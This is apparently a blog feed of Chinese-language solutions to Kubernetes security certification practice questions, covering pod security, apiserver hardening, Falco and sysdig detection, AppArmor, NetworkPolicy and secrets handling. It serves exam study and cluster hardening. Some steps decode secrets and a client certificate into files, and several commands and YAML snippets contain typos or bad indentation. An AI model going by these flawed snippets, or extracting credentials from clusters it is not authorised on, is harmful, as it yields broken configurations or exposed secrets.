There is Deployment container-host-hacker in Namespace team-red which mounts /run/containerd as a hostPath volume on the Node where it’s running. This means that the Pod can access various data about other containers running on the same Node.

To prevent this configure Namespace team-red to enforce the baseline Pod Security Standard. Once completed, delete the Pod of the Deployment mentioned above.

Check the ReplicaSet events and write the event/log lines containing the reason why the Pod isn’t recreated into /opt/course/4/logs .

译文

任务权重：8%。

使用环境: kubectl config use-context workload-prod

名称空间 team-red 中有一个 deployment container-host-hacker ，它将 /run/containerd 挂载为运行中的 Node 上的 hostPath 卷。这意味着该 Pod 可以访问在同一节点上运行的其他容器的各种数据。

为了防止这种情况，配置 Namespace team-red 来执行基线 Pod 安全标准。完成后，删除上面提到的部署的 Pod 。

检查 ReplicaSet 事件，并将包含 Pod 未重新创建原因的事件/日志行写入 /opt/course/4/logs。

解答

命名空间安全标准通过标签发挥作用,直接编辑namespace

k edit ns team-red

apiVersion: v1
kind: Namespace
metadata:
  labels:
    kubernetes.io/metadata.name: team-red
    pod-security.kubernetes.io/enforce: baseline # 添加
  name: team-red

现在删除pod,deployment 会自动创建pod,但是重新创建会失败,检查原因

k -n team-red get pod
k -n team-red delete pod container-host-hacker-dbf989777-wm8fc
k -n team-red get pod
k -n team-red get rs
k -n team-red describe rs container-host-hacker-dbf989777

pod-sec-0

把日志写入文件 /opt/course/4/logs

# /opt/course/4/logs
Warning  FailedCreate      2m2s (x9 over 2m40s)  replicaset-controller  (combined from similar events): Error creating: pods "container-host-hacker-dbf989777-kjfpn" is forbidden: violates PodSecurity "baseline:latest": hostPath volumes (volume "containerdata")

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 3 | Apiserver Security /archives/kubernetes/CKS/API-server-sec-2.html Task weight: 3%

Use context: kubectl config use-context workload-prod

You received a list from the DevSecOps team which performed a security investigation of the k8s cluster1 ( workload-prod ). The list states the following about the apiserver setup:

Accessible through a NodePort Service

Change the apiserver setup so that:

Only accessible through a ClusterIP Service

译文

任务重量：3%。

使用环境: kubectl config use-context workload-prod

你收到一份来自DevSecOps团队的清单，该团队对k8s cluster1（ workload-prod ）进行了安全调查。该清单对apiserver的设置做了如下说明。

可通过 NodePort 访问

改变apiserver的设置，以便。

只能通过 ClusterIP Service 访问

解答

为了修改apiserver的参数，我们首先ssh进入主节点，检查apiserver进程的参数。

ssh cluster1-controlplane1

ps aux | grep kube-apiserver  #检查api-server
kubectl get svc               #查看svc
cp /etc/kubernetes/manifests/kube-apiserver.yaml .
vim /etc/kubernetes/manifests/kube-apiserver.yaml

#/etc/kubernetes/manifests/kube-apiserver.yaml
...
spec:
  containers:
  - command:
    - kube-apiserver
    - --advertise-address=192.168.100.11
    - --allow-privileged=true
    - --authorization-mode=Node,RBAC
    - --client-ca-file=/etc/kubernetes/pki/ca.crt
    - --enable-admission-plugins=NodeRestriction
    - --enable-bootstrap-token-auth=true
    - --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
    - --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
    - --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
    - --etcd-servers=https://127.0.0.1:2379
    - --kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt
    - --kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key
    - --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
#    - --kubernetes-service-node-port=31000   # 删除这一行或者设置为0
    - --proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt
...

删除旧的svc 自动新创建的svc则为clusterIP类型

kubectl delete svc kubernetes
kubectl get svc

API-server-sec-2-0

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 2 | Runtime Security with Falco /archives/kubernetes/CKS/falco-2.html Task weight: 4%

Use context: kubectl config use-context workload-prod

Falco is installed with default configuration on node cluster1-node1 . Connect using ssh cluster1-node1 . Use it to:

Find a Pod running image nginx which creates unwanted package management processes inside its container.
Find a Pod running image httpd which modifies /etc/passwd .

Save the Falco logs for case 1 under /opt/course/2/falco.log in format: time-with-nanosconds,container-id,container-name,user-name No other information should be in any line. Collect the logs for at least 30 seconds.

Afterwards remove the threads (both 1 and 2) by scaling the replicas of the Deployments that control the offending Pods down to 0.

译文

任务权重：4%。

使用环境: kubectl config use-context workload-prod

Falco已经以默认配置安装在 cluster1-node1 节点上。使用 ssh cluster1-node1 连接到节点

找到一个运行nginx镜像的Pod，它在其容器内创建了不需要的包管理进程。
找到一个运行httpd镜像的Pod，它修改了/etc/passwd。

将上面的Falco日志保存在/opt/course/2/falco.log下，格式为。 time-with-nanosconds,container-id,container-name,user-name 任何一行都不应该有其他信息。收集至少30秒的日志。

之后，将违规 Pod 的 Deployments 的副本缩减到 0 ，删除线程（包括1和2）。

参考

http://www.falco.org/

https://github.com/draios/sysdig

https://github.com/aquasecurity/tracee

解答

kubectl config use-context workload-prod

ssh cluster1-node1
ll /etc/falco/

检查 falco配置 syslog输出是否开启

# /etc/falco/falco.yaml
...
# Where security notifications should go.
# Multiple outputs can be enabled.

syslog_output:
  enabled: true
...

查看容器id 并通过id 查看pod信息

grep falco /var/log/syslog | grep nginx | grep process | grep container_id
crictl ps -id 7a5ea6a080d1
crictl pods -id 7a864406b9794

falco-2-0

falco-2-1

第一个pod 在 team-blue

grep falco /var/log/syslog  | grep httpd | grep passwd | grep container_id
crictl ps -id b1339d5cc2de
crictl pods -id 595af943c3245

falco-2-2

第二个pod 在 team-purple

对pod进行缩容到0

k -n team-blue scale deploy webapi --replicas 0
k -n team-purple scale deploy rating-service --replicas 0

查找 /etc/falco目录下包含相关单词的文件

grep -ir "Package management process launched" /etc/falco/
cp /etc/falco/falco_rules.yaml .
vim /etc/falco/falco_rules.yaml

falco-2-3

# Container is supposed to be immutable. Package management should be done in building the image.
- rule: Launch Package Management Process in Container
  desc: Package management process ran inside container
  condition: >
    spawned_process
    and container
    and user.name != "_apt"
    and package_mgmt_procs
    and not package_mgmt_ancestor_procs
    and not user_known_package_manager_in_container
  output: >
    #Package management process launched in container (user=%user.name user_loginuid=%user.loginuid
    #command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
    Package management process launched in container %evt.time,%container.id,%container.name,%user.name
    # 删除上面两行,并添加
  priority: ERROR
  tags: [process, mitre_persistence]

格式化输出falco日志, 并把结果复制到文件

systemctl restart falco
grep -i "Package management" /var/log/syslog | awk '{printf $26}' | sed 's/root/root\n/g'

falco-2-4

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 1 | Contexts /archives/kubernetes/CKS/context-2.html Task weight: 1%

You have access to multiple clusters from your main terminal through kubectl contexts. Write all context names into /opt/course/1/contexts , one per line.

From the kubeconfig extract the certificate of user restricted@infra-prod and write it decoded to /opt/course/1/cert .

译文

任务权重：1

你可以通过终端使用 kubectl 访问多个集群。把所有的上下文名称每行一个写进 /opt/course/1/contexts

从 kubeconfig 中提取用户 restricted@infra-prod 的证书，并将其解码后写入 /opt/course/1/cert 。

解答

把所有集群名字写入文件

k config get-contexts
k config get-contexts -o name > /opt/course/1/contexts
或者
k config view -o jsonpath="{.contexts[*].name}" | tr " " "\n" > /opt/course/1/contexts

用户信息

k config view --raw -ojsonpath="{.users[*].name}" # 查看有哪些用户信息
k config view --raw -ojsonpath="{.users[2].user.client-certificate-data}" | base64 -d > /opt/course/1/cert

#或者直接使用命令
k config view --raw -ojsonpath="{.users[?(.name == 'restricted@infra-prod')].user.client-certificate-data}" | base64 -d > /opt/course/1/cert

context-2-0
context-2-1

]]> kubernetes CKS K8s Killer.sh CKS CKS killer.sh模拟环境设置 /archives/kubernetes/CKS/env-setting.html 预先设置环境变量, 提高效率

alias k=kubectl                         # kubectl 命令可以使用k代替
export do="--dry-run=client -o yaml"    # 导出yaml文件 可以用$do , 如 k create deploy nginx --image=nginx $do
export now="--force --grace-period 0"   # 强制 如:  k delete pod x $now

vim 设置

echo "ts=2 sw=2 et ai" >> ~/.vimrc
source ~/.vimrc

设置空格, tab,为2, tab为2空格, 换行自动对齐

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 16、ImagePolicyWebhook容器镜像扫描 /archives/kubernetes/CKS/ImagePolicyWebhook-scan.html ImagePolicyWebhook-scan-0

Context

cluster 上设置了容器镜像扫描器，但尚未完全集成到 cluster 的配置中。完成后，容器镜像扫描器应扫描并拒绝易受攻击的镜像的使用。

Task

注意：你必须在 cluster 的 master 节点上完成整个考题，所有服务和文件都已被准备好并放置在该节点上。

给定一个目录 /etc/kubernetes/epconfig 中不完整的配置，以及具有 HTTPS 端点 https://image-bouncer-webhook.default.svc:1323/image_policy 的功能性容器镜像扫描器：

启用必要的插件来创建镜像策略
校验控制配置并将其更改为隐式拒绝（implicit deny）
编辑配置以正确指向提供的 HTTPS 端点

最后，通过尝试部署易受攻击的资源 /cks/img/web1.yaml 来测试配置是否有效。

参考

https://kubernetes.io/zh/docs/reference/access-authn-authz/admission-controllers/#如何启用一个准入控制器

https://kubernetes.io/zh/docs/reference/access-authn-authz/admission-controllers/#imagepolicywebhook

https://kubernetes.io/zh/docs/tasks/debug/debug-cluster/audit/#log-后端

解答

切换集群

kubectl config use-context KSSH00901

远程到master并切换root

ssh master01
sudo -i

编辑admission_configuration.json（题目会给这个目录），修改defaultAllow为false：

vi /etc/kubernetes/epconfig/admission_configuration.json

"denyTTL": 50,
"retryBackoff": 500,
"defaultAllow": false #将true改为false

编辑/etc/kubernetes/epconfig/kubeconfig.yml，添加 webhook server 地址：操作前，先备份配置文件

cp /etc/kubernetes/epconfig/kubeconfig.yml bakyaml/
vi /etc/kubernetes/epconfig/kubeconfig.yml

修改如下内容

  certificate-authority: /etc/kubernetes/epconfig/server.crt
  server: https://image-bouncer-webhook.default.svc:1323/image_policy #添加webhook server地址
name: bouncer_webhook

编辑kube-apiserver.yaml，从官网中引用 ImagePolicyWebhook 的配置信息：操作前，先备份配置文件

cp /etc/kubernetes/manifests/kube-apiserver.yaml bakyaml/
vi /etc/kubernetes/manifests/kube-apiserver.yaml

在- command:下添加如下内容，注意空格要对齐（不建议放到最后，建议放置的位置详见下方截图）

- --enable-admission-plugins=NodeRestriction,ImagePolicyWebhook

- --admission-control-config-file=/etc/kubernetes/epconfig/admission_configuration.json
#在1.25的考试中，默认这行已经添加了，但为了以防万一，模拟环境，没有添加，需要你手动添加。考试时，你先检查，有的话，就不要再重复添加了。重复添加反而会报错！

ImagePolicyWebhook-scan-1

在kube-apiserver.yaml的 volumeMounts 增加

volumeMounts: #在volumeMounts下面增加 #注意，在1.25考试中，蓝色的内容可能已经有了，你只需要添加绿色字体的内容。可以通过红色字，在文件中定位。但模拟环境没有加，需要你全部手动添加。这样是为了练习，万一考试中没有，你也会加。但是如果考试中已添加，你再添加一遍，则会报错，导致api-server启不起来。
- mountPath: /etc/kubernetes/epconfig #建议紧挨着volumeMounts的下方增加
name: epconfig
readOnly: true

ImagePolicyWebhook-scan-2

在kube-apiserver.yaml的volumes 增加

volumes: #在volumes下面增加 #注意，在1.25考试中，蓝色的内容可能已经有了，你只需要检查确认一下是否准确。可以通过红色字，在文件中定位。但模拟环境没有加，需要你全部手动添加。这样是为了练习，万一考试中没有，你也会加。但是如果考试中已添加，你再添加一遍，则会报错，导致api-server启不起来。
- name: epconfig #建议紧挨着volumes的下方增加
hostPath:
path: /etc/kubernetes/epconfig
type: DirectoryOrCreate
#如果你写的是目录，则是DirectoryOrCreate，如果你写的是文件，则是File

ImagePolicyWebhook-scan-3

重启并检查集群

systemctl restart kubelet
kubectl -n kube-system get pod

通过尝试部署易受攻击的资源 /cks/img/web1.yaml 来测试配置是否有效无法创建pod，如下报错，表示成功。因为模拟环境里的image_policy策略是镜像tag是latest的不允许创建。

kubectl apply -f /cks/img/web1.yaml

ImagePolicyWebhook-scan-4

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 15、TLS安全配置 /archives/kubernetes/CKS/TLS-sec.html TLS-sec-0

Task

通过TLS加强kube-apiserver安全配置，要求

kube-apiserver除了 TLS 1.3 及以上的版本可以使用，其他版本都不允许使用。
密码套件（Cipher suite）为 TLS_AES_128_GCM_SHA256

通过TLS加强ETCD安全配置，要求

密码套件（Cipher suite）为 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256

参考

https://kubernetes.io/zh-cn/docs/reference/command-line-tools-reference/kube-apiserver/

TLS-sec-1

TLS-sec-2

解答

切换集群

kubectl config user-context KSRS00501

远程到 master 并切换到 root

ssh master01
sudo -i

修改 kube-apiserver, 养成修改之前备份文件的好习惯

mkdir bakyaml
cp /etc/kubernetes/manifests/kube-apiserver.yaml bakyaml/
vim /etc/kubernetes/manifests/kube-apiserver.yaml

添加或修改相关内容，并保存(先检查一下，如果考试环境里已经给你这两条了，则你只需要修改即可)

- --tls-cipher-suites=TLS_AES_128_GCM_SHA256
- --tls-min-version=VersionTLS13

等待3分钟，等集群应用策略后，再检查kube-apiserver，确保Running。

kubectl -n kube-system get pod

修改 ETCD

cp /etc/kubernetes/manifests/etcd.yaml bakyaml/
vim /etc/kubernetes/manifests/etcd.yaml

添加或修改相关内容，并保存

- --cipher-suites=TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256

修改完成后，需要等待3分钟，等集群应用策略后，再检查一下所有pod，特别是etcd和kube-apiserver两个pod，确保模拟环境是正常的。

kubectl get pod -A
kubectl -n kube-system get pod

TLS-sec-3

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 14、启用API server认证 /archives/kubernetes/CKS/API-server-sec.html API-server-auth-0

Context

由 kubeadm 创建的 cluster 的 Kubernetes API 服务器，出于测试目的，临时配置允许未经身份验证和未经授权的访问，授予匿名用户 cluster-admin 的访问权限.

Task

重新配置 cluster 的 Kubernetes APl 服务器，以确保只允许经过身份验证和授权的 REST 请求。使用授权模式 Node , RBAC 和准入控制器 NodeRestriction 。删除用户 system:anonymous 的 ClusterRoleBinding 来进行清理。

注意：所有 kubectl 配置环境/文件也被配置使用未经身份验证和未经授权的访问。你不必更改它，但请注意，一旦完成 cluster 的安全加固， kubectl 的配置将无法工作。您可以使用位于 cluster 的 master 节点上，cluster 原本的 kubectl 配置文件 /etc/kubernetes/admin.conf ，以确保经过身份验证的授权的请求仍然被允许。

模拟环境里，初始化这道题的脚本为b.sh

参考

https://kubernetes.io/zh/docs/reference/command-line-tools-reference/kube-apiserver/

解答

切换集群

kubectl config use-context KSCF00301

远程到 master 并切换到 root

ssh master01
sudo -i
sh /root/b.sh #模拟这道题的环境

确保只有认证并且授权过的REST请求才被允许 /etc/kubernetes/manifests/kube-apiserver.yaml

- --authorization-mode=AlwaysAllow
- --enable-admission-plugins=AlwaysAdmit

修改为

- --authorization-mode=Node,RBAC 
#注意，只保留Node,RBAC这两个，中间是英文状态下的逗号。在1.25考试中，这一条可能默认已经有了，但还是要检查确认一下。

- --enable-admission-plugins=NodeRestriction 
#在1.25考试中，这一个原先为AlwaysAdmit，需要修改为NodeRestriction。

重启kubelet

systemctl daemon-reload
systemctl restart kubelet
kubectl get pod -A #过几分钟集群才会恢复正常

删除题目要求的角色绑定

kubectl get clusterrolebinding system:anonymous     #检查
kubectl delete clusterrolebinding system:anonymous  #删除
kubectl get clusterrolebinding system:anonymous     #检查

API-server-auth-1

验证

API-server-auth-2

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 13、Container安全上下文 /archives/kubernetes/CKS/context-sec.html Container-sec-context-0

Context

Container Security Context应在特定namespace中修改Deployment。

Task

按照如下要求修改 sec-ns 命名空间里的 Deployment secdep

用ID为 30000 的用户启动容器（设置用户ID为: 30000）
不允许进程获得超出其父进程的特权（禁止allowPrivilegeEscalation）
以只读方式加载容器的根文件系统（对根文件的只读权限）

参考

https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/security-context/

解答w

切换集群

kubectl config use-context KSMV00102

Container-sec-context-1

修改 deployment secdep

kubectl -n sec-ns edit deployment secdep

在template字段下面的spec里面，添加或修改如下红字内容，并保存（考试中也是在Deployment下有两个image的）请注意，考试和模拟环境中，先检查spec下面（非containers下面）是否有securityContext: {}，如果有则可以直接修改即可。否则重复添加是不生效的。

securityContext:
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true

Container-sec-context-2

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 12、Sysdig & falco /archives/kubernetes/CKS/Sysdig-falco.html Sysdig-falco-0

Task：使用运行时检测工具来检测 Pod tomcat123 单个容器中频发生成和执行的异常进程。有两种工具可供使用：

sysdig
falco

注：这些工具只预装在 cluster 的工作节点 node02 上，不在 master 节点。使用工具至少分析 30 秒，使用过滤器检查生成和执行的进程，将事件写到 /opt/KSR00101/incidents/summary 文件中，其中包含检测的事件，格式如下： timestamp , uid/username , processName

Sysdig-falco-1

保持工具的原始时间戳格式不变。注：确保事件文件存储在集群的工作节点上。

请注意，考试时，考题里已表明sysdig在工作节点上，所以你需要ssh到开头写的工作节点上。但在模拟环境，你需要ssh到node02这个工作节点。

解答

切换集群

kubectl config use-context KSSC00401

切换到 node02 节点使用root

ssh node02
sudo -i

找到containerd的socket

crictl info | grep sock

Sysdig-falco-3

使用crictl命令找到容器，题目要求的是tomcat123，则grep tomcat123。 crictl ps | grep tomcat123

注意，考试时，你要通过上面命令grep pod name，然后你要记住的是container name。只是模拟环境里的pod name和container name一样，都是tomcat123。

Sysdig-falco-4

通过 sysdig 扫描容器30s并输出到指定文件： sysdig -h 和-l 查看帮助注：可以使用 sysdig -l |grep time 过滤，确认输出格式字段

sysdig -l | grep time
sysdig -l | grep uid
sysdig -l | grep proc

开始扫描（我目前想不到别的方法，只能将命令分成2条了，谁有更好的方法，可以分享一下。）（container.name也可以换成container.id=7cb82fdbc1295。注意要写container name，而不是pod name，只是模拟环境里，pod name和container name一样，都是tomcat123）

sysdig -M 30 -p "%evt.time,%user.uid,%proc.name" --cri /run/containerd/containerd.sock container.name=tomcat123 >> /opt/KSR00101/incidents/summary
sysdig -M 30 -p "%evt.time,%user.name,%proc.name" --cri /run/containerd/containerd.sock container.name=tomcat123 >> /opt/KSR00101/incidents/summary

提示：如果考试时执行sysdig报错“Unable to load the driver”，则执行下面一条命令：（模拟环境里不需要执行）

#启用模块
sysdig-probe-loader

然后再次执行sysdig -M 30 ……

如果还是报错，就重装一下sysdig，命令为 apt install sysdig

查看保存的文件

cat /opt/KSR00101/incidents/summary |head

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 11、AppArmor /archives/kubernetes/CKS/AppArmor.html AppArmor-0

Context

APPArmor 已在 cluster 的工作节点node02上被启用。一个 APPArmor 配置文件已存在，但尚未被实施。

Task

在 cluster 的工作节点node02上，实施位于 /etc/apparmor.d/nginx_apparmor 的现有APPArmor 配置文件。编辑位于 /cks/KSSH00401/nginx-deploy.yaml 的现有清单文件以应用 AppArmor 配置文件。最后，应用清单文件并创建其中指定的 Pod 。

请注意，考试时，考题里已表明APPArmor在工作节点上，所以你需要ssh到开头写的工作节点上。在模拟环境，你需要ssh到node02这个工作节点。

AppArmor-1

参考

https://kubernetes.io/zh/docs/tutorials/security/apparmor/#example

解答

切换集群

kubectl config use-context KSSH00401

连接到 node02 并切换到 root

ssh node02
sudo -i

切换到 apparmor 目录, 并检查配置文件

vi /etc/apparmor.d/etc/apparmor.d/nginx_apparmor

nginx_apparmor

#include 
#nginx-profile-3 #检查这一行是否存在 存在则注释掉
profile nginx-profile-3 flags=(attach_disconnected) {
  #include 
  file,
  # Deny all file writes.
  deny /** w,
}

AppArmor-2

执行并检查 apparmor策略模块

apparmor_parser -q /etc/apparmor.d/nginx_apparmor
apparmor_status | grep nginx-profile-3

AppArmor-3

修改 pod 文件

注意！注意！考试时，这个文件是在默认登录的终端那个初始节点上的，而不是在这个work节点的

vi /cks/KSSH00401/nginx-deploy.yaml

添加注解

annotations:
  container.apparmor.security.beta.kubernetes.io/podx: localhost/nginx-profile-3

创建pod

kubectl -f  /cks/KSSH00401/nginx-deploy.yaml create

检查

kubectl get pod
kubectl exec podx -- cat /proc/1/attr/current
kubectl exec podx -- touch /tmp/test

查看current显示 xxx (enforce) 创建文件提示权限不足

AppArmor-4

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 10、Trivy 扫描镜像安全漏洞 /archives/kubernetes/CKS/Trivy-scan.html Trivy-scan-0

Task

使用 Trivy 开源容器扫描器检测 namespace kamino 中具有严重漏洞的镜像的 Pod。

查找具有 High 或 Critical 严重性漏洞的镜像，并删除使用这些镜像的 Pod 。

注意：Trivy 仅安装在 cluster 的 master 节点上，在工作节点上不可使用。你必须切换到 cluster 的 master 节点才能使用 Trivy

参考资料

https://kubernetes.io/zh-cn/docs/reference/kubectl/cheatsheet/#格式化输出

解答

切换集群
kubectl config use-context KSSC00401

查看namespace下pod 和image

kubectl get pods -n kamino -o=custom-columns="NAME:.metadata.name,IMAGE:.spec.containers[*].image"

Trivy-scan-1

提取镜像名并进行扫描

kubectl describe pod -n kamino | grep -i image: |awk '{print $2}' | sort -u

Trivy-scan-2

扫描并显示结果

for i in `kubectl describe pod -n kamino | grep -i image: |awk '{print $2}' | sort -u`; do trivy -q image -s HIGH,CRITICAL $i | grep -iEB3 "HIGH:|CRITICAL:" ; done

Trivy-scan-3

可以看到除了amazonlinux:2 其他镜像都存在高危漏洞, 对应之前的pod和images列表删除包含漏洞的image即可

删除包含漏洞的pod

kubectl -n kamino delete pod tri111 tri222 tri333

Trivy-scan-4

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 9、网络策略NetworkPolicy /archives/kubernetes/CKS/NetworkPolicy-2.html NetworkPolicy-2-0

Task

创建一个名为 pod-restriction 的 NetworkPolicy 来限制对在 namespace dev-team 中运行的 Pod products-service 的访问。只允许以下 Pod 连接到 Pod products-service

namespace qaqa 中的 Pod
位于任何 namespace，带有标签 environment: testing 的 Pod 注意：确保应用 NetworkPolicy。

你可以在 /cks/net/po.yaml 找到一个模板清单文件。

参考

https://kubernetes.io/zh/docs/concepts/services-networking/network-policies/#networkpolicy-resource

解答

切换集群

kubectl config use-context KSSH00301

检查namespace标签

模拟环境已提前打好标签了，所以你只需要检查标签即可。但为了防止考试时，没有给你打标签，所以还是需要你将下面打标签的命令记住。

# 查看 qaqa 命名空间标签（name: qaqa）
kubectl get ns --show-labels

# 查看 pod 标签（environment: testing）
kubectl get pod -n dev-team --show-labels

如果 Pod 或者 Namespace 没有标签，则需要打上标签。注意：我这里将pod products-service的标签打成了environment: testing，下面会有解释，不要和题目里要求的“位于任何namespace，带有标签environment: testing的Pod”这句话里的标签混淆了。

kubectl label ns qaqa name=qaqa
kubectl label pod products-service environment=testing -n dev-team

创建NetworkPolicy

vi /cks/net/po.yaml

metadata:
  name: pod-restriction #修改
  namespace: dev-team #修改
spec:
  podSelector:
  matchLabels:
    environment: testing #根据题目要求的标签修改，这个写的是Pod products-service的标签，也就是使用kubectl get pod -n dev-team --show-labels查出来的pod的标签，这个标签不要和题目里要求的“位于任何namespace，带有标签environment: testing的Pod”这句话里的标签混淆了，两个没有关系，所以可不一样。比如你考试时查出来的POD products-service的标签是name: products，那这里的environment: testing就要换成name: products。
  policyTypes:
  - Ingress #注意，这里只写 - Ingress，不要将 - Egress也复制进来！
  ingress:
  - from: #第一个from
    - namespaceSelector:
      matchLabels:
        name: qaqa #命名空间有name: qaqa标签的
  - from: #第二个from
    - namespaceSelector: {} #修改为这样，所有命名空间
      podSelector: #注意，这个podSelector前面的“-” 要删除，换成空格，空格对齐要对。
        matchLabels:
          environment: testing #有environment: testing标签的Pod，这个地方是根据题目要求“Pods with label environment: testing , in any namespace”，这句话里的pod标签写的。不要和上面spec里的混淆。

NetworkPolicy-2-1

创建检查

kubectl apply -f /cks/net/po.yaml
kubectl get networkpolicy -n dev-team

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 8、沙箱运行容器 gVisor /archives/kubernetes/CKS/sandbox-gVisor.html sandbox-gVisor-0

Context

该 cluster 使用 containerd 作为 CRI 运行时。containerd 的默认运行时处理程序是 runc 。 containerd 已准备好支持额外的运行时处理程序 runsc (gVisor)。

Task

使用名为 runsc 的现有运行时处理程序，创建一个名为 untrusted 的 RuntimeClass。更新 namespace server 中的所有 Pod 以在 gVisor 上运行。您可以在 /cks/gVisor/rc.yaml 中找到一个模版清单。

参考

https://kubernetes.io/zh-cn/docs/concepts/containers/runtime-class/#2-创建相应的-runtimeclass-资源

解答

切换集群

kubectl config use-context KSMV00301

创建RuntimeClass

vim /cks/gVisor/rc.yaml

rc.yaml

apiVersion: node.k8s.io/v1   ##将apiVersion: node.k8s.io/v1beta1修改为apiVersion: node.k8s.io/v1。这个在1.25正式考试的时候，是对的，不需要修改的。
kind: RuntimeClass
metadata:
  name: untrusted # 用来引用 RuntimeClass 的名字，RuntimeClass 是一个集群层面的资源
handler: runsc    # 对应的 CRI 配置的名称

kubectl -f /cks/gVisor/rc.yaml create
kubectl get RuntimeClass

将命名空间为server下的Pod引用RuntimeClass。考试时，3个Deployment下有3个Pod，修改3个deployment即可。

kubectl -n server get deployment

kubectl -n server edit deployments busybox-run
kubectl -n server edit deployments nginx-host
kubectl -n server edit deployments run-test

spec: #找到这个spec，注意在deployment里是有两个单独行的spec的，要找第二个，也就是下面有containers这个字段的spec。
  runtimeClassName: untrusted #添加这一行，注意空格对齐，保存会报错，忽略即可。
  containers:
  - image: nginx:1.9
    imagePullPolicy: IfNotPresent
    name: run-test

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 7、Dockerfile检测 /archives/kubernetes/CKS/check-dockerfile.html check-dockerfile-0

Task

分析和编辑给定的Dockerfile /cks/docker/Dockerfile（基于ubuntu:16.04 镜像），并修复在文件中拥有的突出的安全/最佳实践问题的 两个指令。

分析和编辑给定的清单文件 /cks/docker/deployment.yaml ，并修复在文件中拥有突出的安全/最佳实践问题的 两个字段。

注意：请勿添加或删除配置设置；只需修改现有的配置设置让以上两个配置设置都不再有安全/最佳实践问题。

注意：如果您需要非特权用户来执行任何项目，请使用用户ID 65535 的用户 nobody 。

只修改即可，不需要创建。

参考

https://kubernetes.io/zh/docs/concepts/security/pod-security-standards/#restricted

解答

切换集群

kubectl config use-context KSSC00301

修改Dockerfile

vim /cks/docker/Dockerfile

#修改基础镜像为题目要求的 ubuntu:16.04
FROM ubuntu:16.04

#仅将CMD上面的USER root修改为USER nobody，不要改其他的USER root。
USER nobody

修改deployment.yaml

vim /cks/docker/deployment.yaml

#template里标签跟上面的内容不一致，所以需要将原先的run: couchdb修改为app: couchdb
app: couchdb
#注意，这里具体要改成app: couchdb还是其他的标签，要以考试给你的yaml文件的上下文其他标签为准，要与另外两个标签一致，具体见下方截图。）


#删除 'SYS_ADMIN' 字段，确保 'privileged': 为False 
#(CKS考试是有多套类似考试环境的，所以有时是删SYS_ADMIN，有时是改'privileged': False）
#注意 注意，如果考试时，本来就没有'SYS_ADMIN' 字段，且'privileged':也默认就为False，则直接将直接改成如下。
securityContext:
  privileged: False

check-dockerfile-1
check-dockerfile-2

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 6、创建 Secret /archives/kubernetes/CKS/create-secret.html create-secret-0

Task

在 namespace istio-system 中获取名为 db1-test 的现有 secret 的内容将 username 字段存储在名为 /cks/sec/user.txt 的文件中，并将password 字段存储在名为 /cks/sec/pass.txt 的文件中。注意：你必须创建以上两个文件，他们还不存在。

注意：不要在以下步骤中使用/修改先前创建的文件，如果需要，可以创建新的临时文件。

在 istio-system namespace 中创建一个名为 db2-test 的新 secret ，内容如下： username : production-instancepassword : KvLftKgs4aVH 最后，创建一个新的 Pod ，它可以通过卷访问 secret db2-test ： Pod 名称 secret-pod Namespace istio-system 容器名 dev-container 镜像 nginx 卷名 secret-volume 挂载路径 /etc/secret

参考

https://kubernetes.io/zh/docs/tasks/configmap-secret/managing-secret-using-kubectl/#decoding-secret

https://kubernetes.io/zh/docs/tasks/configmap-secret/managing-secret-using-kubectl/#create-a-secret

https://kubernetes.io/zh/docs/concepts/configuration/secret/#using-secrets

解答

切换集群

kubectl config use-context KSCH00701

将db1-test的username和password，通过base64解码保存到题目指定文件：

kubectl -n istio-system get secrets db1-test -o jsonpath={.data.username} | base64 -d > /cks/sec/user.txt
kubectl -n istio-system get secrets db1-test -o jsonpath={.data.password} | base64 -d > /cks/sec/pass.txt

检查

cat /cks/sec/user.txt
cat /cks/sec/pass.txt

创建名为 db2-test 的 secret 使用题目要求的用户名和密码作为键值。注意要加命名空间。

注意，如果密码中有特殊字符（例如：$，\， *，= 和 !），需要加单引号来转义–from-literal=password=’G!Y* d$zDsb’这样

kubectl -n istio-system create secret generic db2-test --from-literal username=production-instance --from-literal assword=KvLftKgs4aVH
kubectl -n istio-system get secret

根据题目要求，参考官网，创建Pod使用该secret

vim k8s-secret.yaml

k8s-secret.yaml

apiVersion: v1
kind: Pod
metadata:
  name: secret-pod          #pod名字
  namespace: istio-system   #命名空间
spec:
  containers:
  - name: dev-container     #容器名字
    image: nginx            #镜像名字
    volumeMounts:
    - name: secret-volume   #卷名
      mountPath: "/etc/secret"  #挂载路径
  volumes:
  - name: secret-volume     #卷名
    secret:
      secretName: db2-test  #名为 db2-test 的 secret

kubectl -f k8s-secret.yaml create
kubectl -n istio-system get pod

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 5、日志审计 log audit /archives/kubernetes/CKS/log-audit.html log-audit-0

Task

在cluster中启用审计日志。为此，请启用日志后端，并确保：

日志存储在 /var/log/kubernetes/audit-logs.txt
日志文件能保留 10 天
最多保留 2 个旧审计日志文件

/etc/kubernetes/logpolicy/sample-policy.yaml 提供了基本策略。它仅指定不记录的内容。

注意：基本策略位于 cluster 的 master 节点上。

